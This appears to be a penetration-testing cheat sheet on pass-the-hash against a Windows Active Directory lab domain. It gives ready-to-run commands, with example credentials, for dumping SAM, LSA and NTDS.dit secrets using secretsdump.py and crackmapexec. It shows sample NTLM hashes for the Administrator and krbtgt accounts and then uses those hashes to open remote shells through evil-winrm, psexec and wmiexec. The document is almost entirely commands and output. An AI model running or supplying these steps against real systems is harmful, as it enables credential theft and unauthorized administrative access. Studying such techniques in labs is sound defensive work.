# Pass The Hash

## Dump secrets

> Check if our user can retrieve secrets (reading SAM and LSA from registries, NTLM hashes, plaintext credentials, kerberos keys and dump of NTDS.dit)

```bash
python3 /opt/impacket/examples/secretsdump.py 'spookysec.local/backup:23894712389057@10.10.253.172' -outputfile secretsdump.dump
```

Or use `crackmapexec`:

```bash
crackmapexec smb 10.10.253.172 -u 'backup' -p '23894712389057' --ntds
```

```bash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
[...]
```

## Use those secrets

With those hashes we can obtain a CMD using several tools, for example with Administrator:

```bash
evil-winrm -i 10.10.253.172 -u Administrator -H '0e0363213e37b94221497260b0bcb4fc'
psexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
wmiexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
```

### References

{% embed url="<https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b>" %}

{% embed url="<https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets>" %}

{% embed url="<https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/>" %}